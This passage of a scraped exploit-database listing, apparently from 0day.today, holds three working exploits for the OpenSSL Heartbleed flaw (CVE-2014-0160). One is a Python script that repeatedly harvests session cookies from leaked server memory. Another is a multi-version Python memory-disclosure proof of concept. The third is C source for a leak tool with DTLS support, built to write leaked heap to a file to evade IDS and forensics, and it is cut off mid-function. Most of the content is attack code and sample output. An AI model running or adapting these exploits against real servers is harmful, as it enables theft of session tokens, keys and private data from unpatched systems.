Session Extraction Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "1337DAY-ID-22118", "href": "https://0day.today/exploit/description/22118", "sourceData": "#!/usr/bin/python\r\n\r\n# Connects to servers vulnerable to CVE-2014-0160 and looks for cookies, specifically user sessions.\r\n# Michael Davis ([email\u00a0protected])\r\n\r\n# Based almost entirely on the quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email\u00a0protected])\r\n\r\n# The author disclaims copyright to this source code.\r\n\r\nimport select\r\nimport sys\r\nimport string\r\nimport struct\r\nimport socket\r\nimport time\r\nfrom optparse import OptionParser\r\n\r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\noptions.add_option('-c', '--cookie', type='str', default='session', help='Cookie to look for. (default: session)')\r\n\r\n\r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n\r\nhello = h2bin('''\r\n16 03 02 00 dc 01 00 00 d8 03 02 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01\r\n''')\r\n\r\nhb = h2bin('''\r\n18 03 02 00 03\r\n01 40 00\r\n''')\r\n\r\n\r\nclass HeartBleeder(object):\r\n\r\n server_response = None\r\n socket = None\r\n hostname = ''\r\n port = 443\r\n found_sessions = set()\r\n cookie = 'session'\r\n cookie_length = 56\r\n\r\n def __init__(self, hostname='', cookie=''):\r\n self.hostname = hostname\r\n self.cookie = cookie\r\n\r\n def connect(self):\r\n \"\"\"\r\n Connects to the remote server.\r\n \"\"\"\r\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sys.stdout.flush()\r\n self.socket.connect((self.hostname, self.port))\r\n sys.stdout.flush()\r\n self.socket.send(hello)\r\n sys.stdout.flush()\r\n\r\n def rcv_response(self):\r\n while True:\r\n _type, version, payload = self.rcv_message()\r\n if _type is None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if _type == 22 and ord(payload[0]) == 0x0E:\r\n break\r\n\r\n def rcv_message(self):\r\n\r\n record_header = self.rcv_all(5)\r\n if record_header is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n _type, version, line = struct.unpack('>BHH', record_header)\r\n payload = self.rcv_all(line, 10)\r\n if payload is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n # print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return _type, version, payload\r\n\r\n def rcv_all(self, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time()\r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([self.socket], [], [], 5)\r\n if self.socket in r:\r\n data = self.socket.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n\r\n def try_heartbeat(self):\r\n self.socket.send(hb)\r\n while True:\r\n _type, version, self.payload = self.rcv_message()\r\n if _type is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n\r\n if _type == 24:\r\n # print 'Received heartbeat response:'\r\n self.parse_response()\r\n if len(self.payload) > 3:\r\n pass\r\n # print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n\r\n if _type == 21:\r\n print 'Received alert:'\r\n self.hexdump(self.payload)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n\r\n def parse_response(self):\r\n \"\"\"\r\n Parses the response from the server for a session id.\r\n \"\"\"\r\n ascii = ''.join((c if 32 <= ord(c) <= 126 else ' ')for c in self.payload)\r\n index = string.find(ascii, self.cookie)\r\n if index >= 0:\r\n info = ascii[index:index + self.cookie_length]\r\n session = info.split(' ')[0]\r\n session = string.replace(session, ';', '')\r\n if session not in self.found_sessions:\r\n self.found_sessions.add(session)\r\n print session\r\n\r\n def hexdump(self, payload):\r\n \"\"\"\r\n Prints out a hexdump in the event that server returns an error.\r\n \"\"\"\r\n for b in xrange(0, len(payload), 16):\r\n line = [c for c in payload[b:b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in line)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in line)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n\r\n def scan(self):\r\n self.connect()\r\n self.rcv_response()\r\n self.try_heartbeat()\r\n\r\n\r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n\r\n cookies_str = 'session'\r\n if len(args) > 1:\r\n cookies_str = args[1]\r\n\r\n print cookies_str\r\n\r\n while True:\r\n heartbeat = HeartBleeder(hostname=args[0], cookie=cookies_str)\r\n heartbeat.scan()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22118"}, {"lastseen": "2018-03-03T01:40:21", "description": "Exploit for multiple platform in category remote exploits", "edition": 2, "published": "2014-04-09T00:00:00", "type": "zdt", "title": "OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions)", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "id": "1337DAY-ID-22122", "href": "https://0day.today/exploit/description/22122", "sourceData": "# Exploit Title: [OpenSSL TLS Heartbeat Extension - Memory Disclosure - Multiple SSL/TLS versions]\r\n# Date: [2014-04-09]\r\n# Exploit Author: [Csaba Fitzl]\r\n# Vendor Homepage: [http://www.openssl.org/]\r\n# Software Link: [http://www.openssl.org/source/openssl-1.0.1f.tar.gz]\r\n# Version: [1.0.1f]\r\n# Tested on: [N/A]\r\n# CVE : [2014-0160]\r\n \r\n \r\n#!/usr/bin/env python\r\n \r\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email\u00a0protected])\r\n# The author disclaims copyright to this source code.\r\n# Modified by Csaba Fitzl for multiple SSL / TLS version support\r\n \r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n \r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n \r\ndef h2bin(x):\r\n return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n \r\nversion = []\r\nversion.append(['SSL 3.0','03 00'])\r\nversion.append(['TLS 1.0','03 01'])\r\nversion.append(['TLS 1.1','03 02'])\r\nversion.append(['TLS 1.2','03 03'])\r\n \r\ndef create_hello(version):\r\n hello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01\r\n''')\r\n return hello\r\n \r\ndef create_hb(version):\r\n hb = h2bin('18 ' + version + ' 00 03 01 40 00')\r\n return hb\r\n \r\ndef hexdump(s):\r\n for b in xrange(0, len(s), 16):\r\n lin = [c for c in s[b : b + 16]]\r\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\r\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n print\r\n \r\ndef recvall(s, length, timeout=5):\r\n endtime = time.time() + timeout\r\n rdata = ''\r\n remain = length\r\n while remain > 0:\r\n rtime = endtime - time.time()\r\n if rtime < 0:\r\n return None\r\n r, w, e = select.select([s], [], [], 5)\r\n if s in r:\r\n data = s.recv(remain)\r\n # EOF?\r\n if not data:\r\n return None\r\n rdata += data\r\n remain -= len(data)\r\n return rdata\r\n \r\n \r\ndef recvmsg(s):\r\n hdr = recvall(s, 5)\r\n if hdr is None:\r\n print 'Unexpected EOF receiving record header - server closed connection'\r\n return None, None, None\r\n typ, ver, ln = struct.unpack('>BHH', hdr)\r\n pay = recvall(s, ln, 10)\r\n if pay is None:\r\n print 'Unexpected EOF receiving record payload - server closed connection'\r\n return None, None, None\r\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n return typ, ver, pay\r\n \r\ndef hit_hb(s,hb):\r\n s.send(hb)\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ is None:\r\n print 'No heartbeat response received, server likely not vulnerable'\r\n return False\r\n \r\n if typ == 24:\r\n print 'Received heartbeat response:'\r\n hexdump(pay)\r\n if len(pay) > 3:\r\n print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n else:\r\n print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n return True\r\n \r\n if typ == 21:\r\n print 'Received alert:'\r\n hexdump(pay)\r\n print 'Server returned error, likely not vulnerable'\r\n return False\r\n \r\ndef main():\r\n opts, args = options.parse_args()\r\n if len(args) < 1:\r\n options.print_help()\r\n return\r\n for i in range(len(version)):\r\n print 'Trying ' + version[i][0] + '...'\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n print 'Connecting...'\r\n sys.stdout.flush()\r\n s.connect((args[0], opts.port))\r\n print 'Sending Client Hello...'\r\n sys.stdout.flush()\r\n s.send(create_hello(version[i][1]))\r\n print 'Waiting for Server Hello...'\r\n sys.stdout.flush()\r\n while True:\r\n typ, ver, pay = recvmsg(s)\r\n if typ == None:\r\n print 'Server closed connection without sending Server Hello.'\r\n return\r\n # Look for server hello done message.\r\n if typ == 22 and ord(pay[0]) == 0x0E:\r\n break\r\n \r\n print 'Sending heartbeat request...'\r\n sys.stdout.flush()\r\n s.send(create_hb(version[i][1]))\r\n if hit_hb(s,create_hb(version[i][1])):\r\n #Stop if vulnerable\r\n break\r\n \r\nif __name__ == '__main__':\r\n main()\n\n# 0day.today [2018-03-02] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/22122"}, {"lastseen": "2018-04-13T03:43:15", "description": "This exploit uses OpenSSL to create an encrypted connection and trigger the heartbleed leak. The leaked information is returned within encrypted SSL packets and is then decrypted and wrote to a file to annoy IDS/forensics. The exploit can set heartbeat payload length arbitrarily or use two preset values for NULL and MAX length.", "edition": 2, "published": "2014-04-24T00:00:00", "type": "zdt", "title": "Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-24T00:00:00", "id": "1337DAY-ID-22172", "href": "https://0day.today/exploit/description/22172", "sourceData": "/*\r\n* CVE-2014-0160 heartbleed OpenSSL information leak exploit\r\n* =========================================================\r\n* This exploit uses OpenSSL to create an encrypted connection\r\n* and trigger the heartbleed leak. The leaked information is\r\n* returned within encrypted SSL packets and is then decrypted\r\n* and wrote to a file to annoy IDS/forensics. The exploit can\r\n* set heartbeat payload length arbitrarily or use two preset\r\n* values for NULL and MAX length. The vulnerability occurs due\r\n* to bounds checking not being performed on a heap value which\r\n* is user supplied and returned to the user as part of DTLS/TLS\r\n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to\r\n* 1.0.1f are known affected. You must run this against a target\r\n* which is linked to a vulnerable OpenSSL library using DTLS/TLS.\r\n* This exploit leaks upto 65532 bytes of remote heap each request\r\n* and can be run in a loop until the connected peer ends connection.\r\n* The data leaked contains 16 bytes of random padding at the end.\r\n* The exploit can be used against a connecting client or server,\r\n* it can also send pre_cmd's to plain-text services to establish\r\n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients\r\n* will often forcefully close the connection during large leak\r\n* requests so try to lower your payload request size.\r\n*\r\n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g\r\n*\r\n* E.g.\r\n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed\r\n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ connecting to 192.168.11.23 443/tcp\r\n* [ connected to 192.168.11.23 443/tcp\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=65535\r\n* [ final record type=24, length=16384\r\n* [ wrote 16381 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=42\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=18\r\n* [ wrote 18 bytes of heap to file 'out'\r\n* [ done.\r\n* $ ls -al out\r\n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out\r\n* $ hexdump -C out\r\n* - snip - snip \r\n*\r\n* Use following example command to generate certificates for clients.\r\n*\r\n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\r\n* -keyout server.key -out server.crt\r\n*\r\n* Debian compile with \"gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\r\n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto\"\r\n*\r\n* todo: add udp/dtls support.\r\n*\r\n* - Hacker Fantastic\r\n* http://www.mdsec.co.uk\r\n*\r\n*/\r\n \r\n/* Modified by Ayman Sagy aymansagy @ gmail.com - Added DTLS over UDP support\r\n*\r\n* use -u switch, tested against s_server/s_client version 1.0.1d\r\n*\r\n* # openssl s_server -accept 990 -cert ssl.crt -key ssl.key -dtls1\r\n* ...\r\n* # ./heartbleed -s 192.168.75.235 -p 990 -f eshta -t 1 -u\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=1392\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=1336\r\n* [ final record type=24, length=1355\r\n* [ wrote 1352 bytes of heap to file 'eshta'\r\n*\r\n*\r\n* # hexdump -C eshta\r\n* 00000000 00 00 00 00 06 30 f1 95 08 00 00 00 00 00 00 00 |.....0..........|\r\n* 00000010 8c 43 64 ab e3 89 6b fd e3 d3 74 a1 a1 31 8c 35 |.Cd...k...t..1.5|\r\n* 00000020 09 6d b9 e7 08 08 08 08 08 08 08 08 08 a1 65 9f |.m............e.|\r\n* 00000030 ca 13 80 7c a5 88 b0 c9 d5 f6 7b 14 fe ff 00 00 |...|......{.....|\r\n* 00000040 00 00 00 00 00 03 00 01 01 16 fe ff 00 01 00 00 |................|\r\n* 00000050 00 00 00 00 00 40 b5 fd a5 10 da c4 fd fb c7 d2 |[email\u00a0protected]|\r\n* 00000060 9f 0c 56 4b a9 9c 14 00 00 0c 00 03 00 00 00 00 |..VK............|\r\n* 00000070 00 0c 69 ec c4 d5 f3 38 ae e5 2e 3a 1a 32 f9 30 |..i....8...:.2.0|\r\n* 00000080 7f 61 4c 8c d7 34 f3 02 08 3f 68 01 a9 a7 81 55 |.aL..4...?h....U|\r\n* 00000090 01 c9 03 03 03 03 00 00 0e 31 39 32 2e 31 36 38 |.........192.168|\r\n* 000000a0 2e 37 35 2e 32 33 35 00 23 00 00 00 0f 00 01 01 |.75.235.#.......|\r\n* 000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n*\r\n* 00000530 00 00 00 00 00 00 00 00 a5 e2 f5 67 d6 23 85 49 |...........g.#.I|\r\n* 00000540 b3 cc ed c4 d2 74 c8 97 c1 b4 cc |.....t.....|\r\n* 0000054b\r\n*\r\n*\r\n* # openssl s_client -connect localhost:990 -dtls1\r\n* ...\r\n* # ./heartbleed -b localhost -p 990 -u -t 1 -f eshta\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ SSL connection using AES256-SHA\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=1392\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=1336\r\n* [ final record type=24, length=1355\r\n* [ wrote 1352 bytes of heap to file 'eshta'\r\n*\r\n*\r\n* # hexdump -C eshta\r\n* 00000000 00 00 24 4e b7 00 00 00 00 00 00 00 00 18 00 00 |..$N............|\r\n* 00000010 cf d0 5f df c3 64 5f 58 79 17 f8 f7 22 9b 28 6e |.._..d_Xy...\".(n|\r\n* 00000020 c0 e7 d6 a3 08 08 08 08 08 08 08 08 08 9b c3 38 |...............8|\r\n* 00000030 2b 32 5f dd 3a d5 0f 83 51 02 2f 70 33 8f cf 82 |+2_.:...Q./p3...|\r\n* 00000040 21 5b cc 25 80 26 f3 29 c8 90 91 ec 5c 83 68 ee |![.%.&.)....\\.h.|\r\n* 00000050 6b 11 0d ad f1 f4 da 9e 13 59 8f 2a 74 f6 d4 35 |k........Y.*t..5|\r\n* 00000060 9e 17 12 7c 2b 6f 9e a8 1e b4 7a 3c a5 ec 18 e0 |...|+o....z<....|\r\n* 00000070 44 b2 51 e4 69 8c 47 29 39 fb 9e b0 dd 5b 05 4d |D.Q.i.G)9....[.M|\r\n* 00000080 db 11 06 7b 1d 08 58 60 ac 34 3f 2d d1 14 c1 b7 |...{..X`.4?-....|\r\n* 00000090 d5 08 59 73 16 28 f8 75 23 f7 85 27 48 be 1f 14 |..Ys.(.u#..'H...|\r\n* 000000a0 fe ff 00 00 00 00 00 00 00 04 00 01 01 16 fe ff |................|\r\n* 000000b0 00 01 00 00 00 00 00 00 00 40 62 1c 02 19 45 5f |[email\u00a0protected]_|\r\n* 000000c0 2c a6 89 95 d2 bf 16 c4 8b b7 14 00 00 0c 00 04 |,...............|\r\n* 000000d0 00 00 00 00 00 0c e9 fb 75 02 61 90 be 4d f7 82 |........u.a..M..|\r\n* 000000e0 06 d6 fd 6d 53 a1 d5 44 e0 5a 0d 6a 6a 94 ef e8 |...mS..D.Z.jj...|\r\n* 000000f0 4c 01 4b cb 86 73 03 03 03 03 2d 53 74 61 74 65 |L.K..s....-State|\r\n* 00000100 31 21 30 1f 06 03 55 04 0a 0c 18 49 6e 74 65 72 |1!0...U....Inter|\r\n* 00000110 6e 65 74 20 57 69 64 67 69 74 73 20 50 74 79 20 |net Widgits Pty |\r\n* 00000120 4c 74 64 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 |Ltd0..\"0...*.H..|\r\n* 00000130 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 |...........0....|\r\n* 00000140 82 01 01 00 c0 85 26 4a 9d cd f8 5e 46 74 fa 89 |......&J...^Ft..|\r\n* 00000150 e3 7d 58 76 23 ba ba dc b1 35 98 35 a5 ba 53 a1 |.}Xv#....5.5..S.|\r\n* 00000160 5b 37 28 fe f7 d0 02 fc fd c9 e3 b1 ee e6 fe 79 |[7(............y|\r\n* 00000170 86 f8 81 1a 29 29 a9 81 95 1c c9 5c 81 a2 e8 0c |....)).....\\....|\r\n* 00000180 35 b7 cb 67 8a ec 2a d1 73 e6 70 78 53 c8 50 91 |5..g..*.s.pxS.P.|\r\n* 00000190 49 07 db e1 a4 08 7b fb 07 54 48 85 45 c2 38 71 |I.....{..TH.E.8q|\r\n* 000001a0 6a 8a f2 4d a7 ba 1a 86 36 a2 ae bb a1 e1 7c 2c |j..M....6.....|,|\r\n* 000001b0 12 04 ce e5 d1 75 24 94 1c 31 2c 46 b7 76 30 3a |.....u$..1,F.v0:|\r\n* 000001c0 04 79 2f b3 65 74 fb ae c7 10 a5 da a8 2d b6 fd |.y/.et.......-..|\r\n* 000001d0 cf f9 11 fe 38 cd 25 7e 13 75 14 1d 58 92 bb 3f |....8.%~.u..X..?|\r\n* 000001e0 8f 75 d5 52 f7 27 66 ca 5d 55 4d 0a b5 71 a2 16 |.u.R.'f.]UM..q..|\r\n* 000001f0 3e 01 af 97 93 eb 5c 3f e0 fa c8 61 2c a1 87 8f |>.....\\?...a,...|\r\n* 00000200 60 d4 df 5d 9d cd 0f 34 a9 66 6c 93 d8 5f 4a 2b |`..]...4.fl.._J+|\r\n* 00000210 fd 67 3a 2f 88 90 b4 e9 f5 d6 ee bb 7d 8b 1c e5 |.g:/........}...|\r\n* 00000220 f2 cc 4f b2 c0 dc e8 1b 4c 6e 51 c9 47 8b 6c 82 |..O.....LnQ.G.l.|\r\n* 00000230 f9 4b ae 01 a8 f9 6c 6d d5 1a d5 cf 63 f4 7f e0 |.K....lm....c...|\r\n* 00000240 96 54 3f 7d 02 03 01 00 01 a3 50 30 4e 30 1d 06 |.T?}......P0N0..|\r\n* 00000250 03 55 1d 0e 04 16 04 14 af 97 4e 87 62 8a 77 b8 |.U........N.b.w.|\r\n* 00000260 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 1f 06 03 |..$ 5.f.U?t.0...|\r\n* 00000270 55 1d 23 04 18 30 16 80 14 af 97 4e 87 62 8a 77 |U.#..0.....N.b.w|\r\n* 00000280 b8 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 0c 06 |...$ 5.f.U?t.0..|\r\n* 00000290 03 55 1d 13 04 05 30 03 01 01 ff 30 0d 06 09 2a |.U....0....0...*|\r\n* 000002a0 86 48 86 f7 0d 01 01 05 05 00 03 82 01 01 00 b0 |.H..............|\r\n* 000002b0 8e 40 58 2d 86 32 95 11 a7 a1 64 1d fc 08 8d 87 |[email\u00a0protected]|\r\n* 000002c0 18 d3 5d c6 a0 bb 84 4a 50 f5 27 1c 15 4b 02 0c |..]....JP.'..K..|\r\n* 000002d0 49 1f 2d 0a 52 d3 98 6b 71 3d b9 0f 36 24 d3 77 |I.-.R..kq=..6$.w|\r\n* 000002e0 e0 d0 a5 50 e5 ea 2d 67 11 69 4d 45 52 97 4d 58 |...P..-g.iMER.MX|\r\n* 000002f0 de 22 06 02 6d 21 80 2f 0d 1c d5 d5 80 5c 8f 44 |.\"..m!./.....\\.D|\r\n* 00000300 1e b6 f3 41 4c dc d3 40 8d 54 ac b0 ca 8f 19 6a |[email\u00a0protected]|\r\n* 00000310 4d f2 fb ad 68 5a 99 19 ca ae b2 f5 54 70 29 96 |M...hZ......Tp).|\r\n* 00000320 84 7e ba a9 6b 42 e6 68 32 dc 65 87 b1 b7 17 22 |.~..kB.h2.e....\"|\r\n* 00000330 e3 cc 62 97 e4 fa 64 0b 1e 70 bf e5 a2 40 e4 49 |[email\u00a0protected]|\r\n* 00000340 24 f9 05 3f 2e fe 7c 38 56 39 4d bd 51 63 0d 79 |$..?..|8V9M.Qc.y|\r\n* 00000350 85 c0 4b 1a 46 64 e0 fe a8 87 bf c7 4d 21 cb 79 |..K.Fd......M!.y|\r\n* 00000360 37 e7 a6 e3 6c 3b ed 35 17 73 7a 71 c6 72 2f bb |7...l;.5.szq.r/.|\r\n* 00000370 58 dc ef e9 1e a3 89 5e 70 cd 95 10 87 c1 8a 7e |X......^p......~|\r\n* 00000380 e7 51 c2 22 67 66 ee 22 f9 a5 2e 31 f2 ad fc 3b |.Q.\"gf.\"...1...;|\r\n* 00000390 98 c8 30 63 ef 74 b5 4e c4 bd c7 a2 46 0a b8 bf |..0c.t.N....F...|\r\n* 000003a0 df a8 54 0e 4f 37 d0 a5 27 a3 f3 a7 28 38 3f 16 |..T.O7..'...(8?.|\r\n* 000003b0 fe ff 00 00 00 00 00 00 00 02 00 0c 0e 00 00 00 |................|\r\n* 000003c0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n* 000003d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n* *\r\n* 00000530 00 00 00 00 00 00 00 00 82 8f be ff cf 26 12 9d |.............&..|\r\n* 00000540 a2 de 0c 44 21 4a 54 be 41 4c df |...D!JT.AL.|\r\n* 0000054b\r\n*\r\n*/\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <getopt.h>\r\n#include <signal.h>\r\n#include <netdb.h>\r\n#include <fcntl.h>\r\n#include <errno.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <inttypes.h>\r\n#include <openssl/bio.h>\r\n#include <openssl/ssl.h>\r\n#include <openssl/err.h>\r\n#include <openssl/evp.h>\r\n#include <openssl/tls1.h>\r\n#include <openssl/rand.h>\r\n#include <openssl/buffer.h>\r\n \r\n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\r\n (((unsigned int)(c[1])) )),c+=2)\r\n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\r\n c[1]=(unsigned char)(((s) )&0xff)),c+=2)\r\n \r\nint first = 0;\r\nint leakbytes = 0;\r\nint repeat = 1;\r\nint badpackets = 0;\r\n \r\ntypedef struct {\r\n int socket;\r\n SSL *sslHandle;\r\n SSL_CTX *sslContext;\r\n} connection;\r\n \r\ntypedef struct {\r\n unsigned char type;\r\n short version;\r\n unsigned int length;\r\n unsigned char hbtype;\r\n unsigned int payload_length;\r\n void* payload;\r\n} heartbeat;\r\n \r\nvoid ssl_init();\r\nvoid usage();\r\nint tcp_connect(char*,int);\r\nint tcp_bind(char*, int);\r\nconnection* tls_connect(int);\r\nconnection* tls_bind(int);\r\nint pre_cmd(int,int,int);\r\nvoid* heartbleed(connection* ,unsigned int);\r\nvoid* sneakyleaky(connection* ,char*, int);\r\n \r\nstatic DTLS1_BITMAP *dtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch);\r\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap);\r\nstatic int dtls1_buffer_record(SSL *s, record_pqueue *q, unsigned char *priority);\r\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap);\r\n \r\nint tcp_connect(char* server,int port){\r\n int sd,ret;\r\n struct hostent *host;\r\n struct sockaddr_in sa;\r\n host = gethostbyname(server);\r\n sd = socket(AF_INET, SOCK_STREAM, 0);\r\n if(sd==-1){\r\n printf(\"[!] cannot create socket\\n\");\r\n exit(0);\r\n }\r\n sa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n bzero(&(sa.sin_zero),8);\r\n printf(\"[ connecting to %s %d/tcp\\n\",server,port);\r\n ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));\r\n if(ret==0){\r\n printf(\"[ connected to %s %d/tcp\\n\",server,port);\r\n }\r\n else{\r\n printf(\"[!] FATAL: could not connect to %s %d/tcp\\n\",server,port);\r\n exit(0);\r\n }\r\n return sd;\r\n}\r\n \r\nint tcp_bind(char* server, int port){\r\n int sd, ret, val=1;\r\n struct sockaddr_in sin;\r\n struct hostent *host;\r\n host = gethostbyname(server);\r\n sd=socket(AF_INET,SOCK_STREAM,0);\r\n if(sd==-1){\r\n printf(\"[!] cannot create socket\\n\");\r\n exit(0);\r\n }\r\n memset(&sin,0,sizeof(sin));\r\n sin.sin_addr=*((struct in_addr *) host->h_addr);\r\n sin.sin_family=AF_INET;\r\n sin.sin_port=htons(port);\r\n 